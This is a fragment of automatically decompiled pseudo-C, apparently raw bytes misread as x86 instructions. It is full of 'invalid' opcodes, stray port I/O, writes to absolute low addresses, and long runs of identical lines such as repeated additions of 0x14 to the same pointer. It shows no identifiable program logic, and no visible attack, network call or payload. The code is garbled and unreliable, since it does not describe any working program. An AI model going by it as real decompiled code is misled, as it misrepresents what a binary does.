						 *_t855 =  *_t855 + _t855;
						 *_t855 =  *_t855 + _t855;
						_t855 = 0x15;
						 *((intOrPtr*)(0x15)) =  *((intOrPtr*)(0x15)) + 0x14;
						_t1270[0x1b001a00] = _t1270[0x1b001a00] + _t1227;
					} else {
						asm("outsb");
						asm("a16 jb 0x4");
						_t66 = _t1184 + 0x74;
						 *_t66 =  *((intOrPtr*)(_t1184 + 0x74)) + _t1227;
						if( *_t66 >= 0) {
							_t1276 =  *(_t1276 + 0x61) * 0x72;
							 *[gs:eax] =  *[gs:eax] ^ _t855;
							 *_t855 =  *_t855 + _t855;
							asm("pushad");
							 *(_t855 +  *_t855 ^ 0x00000040) =  *(_t855 +  *_t855 ^ 0x00000040) + (_t855 +  *_t855 ^ 0x00000040);
							asm("invalid");
							 *0xff004216 =  *0xff004216 + 1;
							 *0xff004216 =  *0xff004216 + 0xff004216;
							 *((intOrPtr*)(_t1276 + _t1276)) =  *((intOrPtr*)(_t1276 + _t1276)) + _t1227;
							_t855 = 0xffffffffff004217;
							 *0xff004216 =  *0xff004216 + _t1227;
							 *_t1227 =  *_t1227 & 0xffffffffff004217;
							goto L36;
						}
					}
				}
				asm("adc al, 0x40");
				 *_t855 =  *_t855 + _t1227;
				_t1186 = _t855;
				_t1228 = _t1227 + 1;
				 *1 =  *1 + 1;
				 *1 =  *1 + 1;
				_t1270[0x1d] = _t1270[0x1d] + _t1219;
				 *0xFFFFFFFFA800403E =  *((intOrPtr*)(0xffffffffa800403e)) + _t1186;
				ds = 0xd8006c00;
				 *0x00000002 =  *((intOrPtr*)(2)) + _t1228;
				 *1 =  *1 + 1;
				_t1187 = _t1186 + _t1186;
				asm("invalid");
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 1;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				_t859 = 2 + _t1187;
				asm("adc al, 0x40");
				 *_t859 =  *_t859 + _t1228;
				_pop(_t1229);
				if ( *_t859 >= 0) goto L40;
				_t860 = _t1286;
				_t1287 = _t859;
				asm("invalid");
				asm("invalid");
				 *_t860 =  *_t860 + _t860;
				 *_t860 =  *_t860 + _t860;
				 *((intOrPtr*)(0x15)) =  *((intOrPtr*)(0x15)) + _t1229;
				asm("adc al, 0x40");
				 *0x00000026 =  *((intOrPtr*)(0x26)) + _t1229;
				 *((intOrPtr*)(_t1276 + 0x11)) =  *((intOrPtr*)(_t1276 + 0x11)) + _t1229;
				 *((intOrPtr*)(_t1219 + _t1229 + 0x40)) =  *((intOrPtr*)(_t1219 + _t1229 + 0x40)) + 1;
				 *0x00000017 =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
				 *_t1219 =  *_t1219 + 0x14;
				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + _t1229;
				 *0x0000004C =  *((intOrPtr*)(0x4c)) + 0x17;
				 *0x00000018 =  *((intOrPtr*)(0x18)) + 0x14;
				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 0x14;
				 *0x0000002B =  *((intOrPtr*)(0x2b)) + 1;
				_t1230 = _t1229 + 1;
				asm("invalid");
				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 1;
				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 0x14;
				 *((intOrPtr*)(0x18 +  &(_t1270[0x8520010]))) =  *((intOrPtr*)(0x18 +  &(_t1270[0x8520010]))) + _t1230;
				_t1231 = _t1230 + 1;
				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 0x14;
				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 0x14;
				 *0xFFFFFFFFFFFFFFD8 =  *((intOrPtr*)(0xffffffffffffffd8)) + _t1187 + _t1187;
				if ( *((intOrPtr*)(0xffffffffffffffd8)) <= 0) goto L41;
				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 0x14;
				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 0x14;
				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 0x14;
				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 0x14;
				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 0x14;
				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 0x14;
				asm("in al, 0x15");
				 *_t1219 =  *_t1219 + 0x14;
				 *0x00000019 =  *((intOrPtr*)(0x19)) + 0x14;
				 *((intOrPtr*)(_t1219 + 0x32)) =  *((intOrPtr*)(_t1219 + 0x32)) + _t1231;
				 *0x0000001A =  *((intOrPtr*)(0x1a)) + 0x14;
				 *((intOrPtr*)(0x1a)) =  *((intOrPtr*)(0x1a)) + 0x14;
				asm("adc eax, 0x10040");
				 *0x00000034 =  *((intOrPtr*)(0x34)) + 0x14;
				asm("in al, dx");
				asm("adc eax, 0x40");
				 *((intOrPtr*)(0x34)) =  *((intOrPtr*)(0x34)) + 0x14;
				0x14055da();
				 *((intOrPtr*)(0x34)) =  *((intOrPtr*)(0x34)) + 0x14;
				asm("adc eax, 0x40");
				_t871 = 0x34 + _t1219 + 2;
				 *_t1231 =  *_t1231 ^ 0x00000014;
				 *_t871 =  *_t871 + 0x14;
				 *_t871 =  *_t871 + 0x14;
				_a1092878454 = _t1219;
				_t872 = _t871 + 1;
				 *((intOrPtr*)(_t1219 + _t872 * 2)) =  *((intOrPtr*)(_t1219 + _t872 * 2)) + _t1231;
				_t873 = _t872 + 1;
				 *_t873 =  *_t873 + 0x14;
				ds = ss;
				 *((intOrPtr*)(_t873 + _t873)) =  *((intOrPtr*)(_t873 + _t873)) + _t1231;
				 *_t873 =  *_t873 + 0x14;
				_t874 = _t873 + 1;
				asm("invalid");
				 *_t874 =  *_t874 + 1;
				 *_t874 =  *_t874 + 0x14;
				 *_t874 =  *_t874 + 0x14;
				 *_t874 =  *_t874 + 0x14;
				 *((intOrPtr*)(_t1231 + _t1276)) =  *((intOrPtr*)(_t1231 + _t1276)) + _t1231;
				_t875 = _t874 + 1;
				 *_t875 =  *_t875 + _t1231;
				_t1232 = 0x14006c00;
				if ( *_t875 >= 0) goto L42;
				_t876 = _t1287;
				_t1288 = _t875;
				asm("invalid");
				asm("invalid");
				 *_t876 =  *_t876 + 0x14;
				 *_t876 =  *_t876 + 0x14;
				asm("in al, dx");
				asm("adc eax, 0x156c0040");
				_t877 = _t876 + 1;
				 *((intOrPtr*)(_t877 + 0x11)) =  *((intOrPtr*)(_t877 + 0x11)) + _t1232;
				 *((intOrPtr*)(_t1276 + 0x11)) =  *((intOrPtr*)(_t1276 + 0x11)) + _t1232;
				_t879 = _t877 + 2;
				 *((intOrPtr*)(_t1219 + _t1232 + 0x40)) =  *((intOrPtr*)(_t1219 + _t1232 + 0x40)) + 1;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t879 =  *_t879 + 0x14;
				 *_t1219 =  *_t1219 + 0x14;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 0x14;
				 *((intOrPtr*)(_t879 + 0x35)) =  *((intOrPtr*)(_t879 + 0x35)) + _t879;
				_t880 = _t879 + 1;
				 *_t880 =  *_t880 + 0x14;
				 *_t880 =  *_t880 + 0x14;
				 *((intOrPtr*)(_t880 + 0x16)) =  *((intOrPtr*)(_t880 + 0x16)) + 1;
				_t1233 = _t1232 + 1;
				asm("invalid");
				 *_t880 =  *_t880 + 1;
				 *_t880 =  *_t880 + 0x14;
				 *((intOrPtr*)(_t1276 + _t1276 + 0x40)) =  *((intOrPtr*)(_t1276 + _t1276 + 0x40)) + 0x14;
				 *((intOrPtr*)(_t880 + 0x42)) =  *((intOrPtr*)(_t880 + 0x42)) + 0x14;
				 *_t880 =  *_t880 + 0x14;
				 *_t880 =  *_t880 + 0x14;
				 *_t880 =  *_t880 + _t1219;
				_t881 = _t880 - 1;
				if (_t881 >= 0) goto L43;
				 *_t881 =  *_t881 + 0x14;
				 *_t881 =  *_t881 + 0x14;
				 *_t881 =  *_t881 + 0x14;
				 *_t881 =  *_t881 + 0x14;
				 *_t881 =  *_t881 + 0x14;
				 *_t881 =  *_t881 + 0x14;
				 *_t1270 =  *_t1270 & _t1233;
				_t882 = _t881 + 1;
				 *_t1219 =  *_t1219 + 0x14;
				 *_t882 =  *_t882 + 0x14;
				_t883 = _t882 + _t1233;
				 *_t883 =  *_t883 + 0x14;
				 *_t1270 =  *_t1270 & _t1233;
				_t884 = _t883 + 1;
				 *_t1219 =  *_t1219 + 0x14;
				 *_t884 =  *_t884 + 0x14;
				 *_t884 =  *_t884 + _t1219;
				_pop(ss);
				_t885 = _t884 + 1;
				 *_t885 =  *_t885 + 0x14;
				 *_t885 =  *_t885 + 0x14;
				 *((intOrPtr*)(_t1270 + _t1233)) =  *((intOrPtr*)(_t1270 + _t1233)) + _t885;
				_t886 = _t885 + 1;
				 *_t1219 =  *_t1219 + 0x14;
				 *_t886 =  *_t886 + 0x14;
				 *_t886 =  *_t886 + _t1219;
				_pop(ss);
				_t887 = _t886 + 1;
				 *_t887 =  *_t887 + 0x14;
				_t1270[0x1b001a00] = _t1270[0x1b001a00] + _t1233;
				 *((intOrPtr*)(_t887 + 0x17)) =  *((intOrPtr*)(_t887 + 0x17)) + _t1233;
				_t888 = _t887 + 1;
				 *((intOrPtr*)(_t1288 + _t1219 * 4)) =  *((intOrPtr*)(_t1288 + _t1219 * 4)) + _t1219;
				_t1234 = _t1233 + 1;
				 *_t888 =  *_t888 + 0x14;
				 *_t888 =  *_t888 + 0x14;
				asm("out 0x75, eax");
				_t891 = _t888 + _t1219 + _t888 + _t1219 + 1;
				 *_t891 =  *_t891 + 0x14;
				_pop(ds);
				 *((intOrPtr*)(_t891 + _t891)) =  *((intOrPtr*)(_t891 + _t891)) + _t1234;
				 *_t891 =  *_t891 + 0x14;
				_t892 = _t891 + 1;
				_t1192 = 8;
				asm("invalid");
				 *_t892 =  *_t892 + 1;
				 *_t892 =  *_t892 + 0x14;
				 *_t892 =  *_t892 + 0x14;
				 *_t892 =  *_t892 + 0x14;
				 *((intOrPtr*)(_t892 + 0x17)) =  *((intOrPtr*)(_t892 + 0x17)) + _t1234;
				_t893 = _t892 + 1;
				 *_t893 =  *_t893 + _t1234;
				_pop(_t1235);
				if ( *_t893 >= 0) goto L44;
				_t894 = _t1288;
				_t1289 = _t893;
				asm("invalid");
				asm("invalid");
				 *_t894 =  *_t894 + 0x14;
				 *_t894 =  *_t894 + 0x14;
				 *_t1270 =  *_t1270 - _t1235;
				_t895 = _t894 + 1;
				_t166 = _t895 + 0x70004016;
				 *_t166 =  *((intOrPtr*)(_t895 + 0x70004016)) + _t1219;
				asm("adc [eax], eax");
				if( *_t166 > 0) {
					_t895 = _t895 + 1;
					 *((intOrPtr*)(_t1219 + _t1235 + 0x40)) =  *((intOrPtr*)(_t1219 + _t1235 + 0x40)) + 1;
					 *_t895 =  *_t895 + 0x14;
					 *_t895 =  *_t895 + 0x14;
					 *_t895 =  *_t895 + 0x14;
					 *_t895 =  *_t895 + 0x14;
					 *_t895 =  *_t895 + 0x14;
					 *_t895 =  *_t895 + 0x14;
				}
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t895 =  *_t895 + _t895;
				 *_t1219 =  *_t1219 + _t895;
				 *_t1276 =  *_t1276 + _t1219;
				 *((intOrPtr*)(_t895 + 0x35)) =  *((intOrPtr*)(_t895 + 0x35)) + _t895;
				_t896 = _t895 + 1;
				 *_t896 =  *_t896 + _t896;
				 *_t896 =  *_t896 + _t896;
				_t897 = _t896 + _t1192;
				asm("adc eax, [edx]");
				asm("invalid");
				asm("invalid");
				 *_t897 =  *_t897 + _t897;
				 *_t897 =  *_t897 + _t897;
				 *_t1219 =  *_t1219 & _t897;
				_t1236 = _t1235 + 1;
				 *_t897 =  *_t897 + _t897;
				 *_t897 =  *_t897 + _t897;
				_t174 = _t897 - 0x41;
				 *_t174 =  *((intOrPtr*)(_t897 - 0x41)) + _t1192;
				if ( *_t174 <= 0) goto L47;
				 *_t897 =  *_t897 + _t897;
				 *_t897 =  *_t897 + _t897;
				 *_t897 =  *_t897 + _t897;
				 *_t897 =  *_t897 + _t897;
				 *_t897 =  *_t897 + _t897;
				 *_t897 =  *_t897 + _t897;
				_t1290 = _t1289;
				asm("sbb [eax], al");
				 *_t897 =  *_t897 + _t897;
				 *_t897 =  *_t897 + _t897;
				_t1291 = _t897;
				_t900 = _t1290 + 2;
				 *_t900 =  *_t900 + _t900;
				 *_t900 =  *_t900 + _t900;
				 *((intOrPtr*)(_t900 + _t1192 + 0x40)) =  *((intOrPtr*)(_t900 + _t1192 + 0x40)) + _t1192;
				 *_t1219 =  *_t1219 + _t900;
				 *_t900 =  *_t900 + _t900;
				 *((intOrPtr*)(_t900 + _t1192 + 0x40)) =  *((intOrPtr*)(_t900 + _t1192 + 0x40)) + _t900;
				 *_t900 =  *_t900 + _t900;
				 *_t900 =  *_t900 + _t900;
				 *((intOrPtr*)(_t900 + 0x18)) =  *((intOrPtr*)(_t900 + 0x18)) + _t900;
				_t901 = _t900 + 1;
				 *_t1219 =  *_t1219 + _t901;
				 *_t901 =  *_t901 + _t901;
				 *((intOrPtr*)(_t901 + _t1192 + 0x40)) =  *((intOrPtr*)(_t901 + _t1192 + 0x40)) + _t901;
				 *_t901 =  *_t901 + _t901;
				_t1270[0x1b001a00] = _t1270[0x1b001a00] + _t1236;
				 *((intOrPtr*)(_t901 + _t1192 + 0x3f000040)) =  *((intOrPtr*)(_t901 + _t1192 + 0x3f000040)) + _t1219;
				_t1237 = _t1236 + 1;
				 *_t901 =  *_t901 + _t901;
				 *_t901 =  *_t901 + _t901;
				asm("invalid");
				asm("movsb");
				_t904 = _t901 + _t1219 + 2;
				 *((intOrPtr*)(_t904 + 0x400040 + _t904 * 2)) =  *((intOrPtr*)(_t904 + 0x400040 + _t904 * 2)) + _t1237;
				_pop(ds);
				 *((intOrPtr*)(_t904 + _t904)) =  *((intOrPtr*)(_t904 + _t904)) + _t1237;
				 *_t904 =  *_t904 + _t904;
				_t905 = _t904 + 1;
				_t1193 = _t1192 + _t1192;
				asm("invalid");
				 *_t905 =  *_t905 + 1;
				 *_t905 =  *_t905 + _t905;
				 *_t905 =  *_t905 + _t905;
				 *_t905 =  *_t905 + _t905;
				_t207 = _t905 + _t1193 + 0x5a100040;
				 *_t207 =  *((intOrPtr*)(_t905 + _t1193 + 0x5a100040)) + _t1219;
				if ( *_t207 >= 0) goto L48;
				_t906 = _t1291;
				_t1292 = _t905;
				asm("invalid");
				asm("invalid");
				 *_t906 =  *_t906 + _t906;
				 *_t906 =  *_t906 + _t906;
				asm("sbb [fs:eax], al");
				asm("in al, 0x17");
				_t907 = _t906 + 1;
				 *((intOrPtr*)(_t907 + 0x11)) =  *((intOrPtr*)(_t907 + 0x11)) + _t1237;
				 *((intOrPtr*)(_t1276 + 0x11)) =  *((intOrPtr*)(_t1276 + 0x11)) + _t1237;
				_t909 = _t907 + 2;
				 *((intOrPtr*)(_t1219 + _t1237 + 0x40)) =  *((intOrPtr*)(_t1219 + _t1237 + 0x40)) + _t1193;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t909 =  *_t909 + _t909;
				 *_t1219 =  *_t1219 + _t909;
				 *((intOrPtr*)(_t909 + _t909)) =  *((intOrPtr*)(_t909 + _t909)) + _t909;
				asm("pushad");
				_t910 = _t909 ^ 0x00000040;
				 *_t910 =  *_t910 + _t910;
				asm("invalid");
				 *_t910 =  *_t910 + _t910;
				 *_t910 =  *_t910 + _t910;
				if( *_t910 != 0) {
					_t1171 = _t910 + 1;
					 *((intOrPtr*)(_t1171 + 0x20)) =  *((intOrPtr*)(_t1171 + 0x20)) + _t1193;
					_t1237 = _t1237 + 1;
					 *_t1171 =  *_t1171 + _t1171;
					 *_t1171 =  *_t1171 + _t1171;
					 *((intOrPtr*)(_t1171 + 0x7348)) =  *((intOrPtr*)(_t1171 + 0x7348)) + _t1193;
					 *_t1171 =  *_t1171 + _t1171;
					 *_t1171 =  *_t1171 + _t1171;
					 *_t1171 =  *_t1171 + _t1171;
					 *_t1171 =  *_t1171 + _t1171;
					 *_t1171 =  *_t1171 + _t1171;
					 *((intOrPtr*)(_t1171 + 0x1004019)) =  *((intOrPtr*)(_t1171 + 0x1004019)) + _t1193;
					 *_t1171 =  *_t1171 + _t1171;
					 *((intOrPtr*)(_t1270 + _t1276)) =  *((intOrPtr*)(_t1270 + _t1276)) + _t1237;
					_t910 = _t1171 + 1;
					 *_t910 =  *_t910 + _t910;
					 *_t910 =  *_t910 + _t910;
					 *((intOrPtr*)(_t910 + 0x1004019)) =  *((intOrPtr*)(_t910 + 0x1004019)) + _t1193;
					 *_t910 =  *_t910 + _t910;
					 *((intOrPtr*)(_t910 + 0x4019)) =  *((intOrPtr*)(_t910 + 0x4019)) + _t910;
				}
				 *_t910 =  *_t910 + _t910;
				 *_t910 =  *_t910 + _t910;
				asm("pushfd");
				asm("sbb [eax], eax");
				 *_t910 =  *_t910 + _t910;
				 *_t910 =  *_t910 + _t910;
				_t1270[0x1b001a00] = _t1270[0x1b001a00] + _t1237;
				_t912 =  *0x4019 + _t1219;
				asm("sbb [eax], eax");
				_a66 = _a66 - _t912;
				 *_t912 =  *_t912 + _t912;
				asm("in al, 0xa");
				if ( *_t912 <= 0) goto L51;
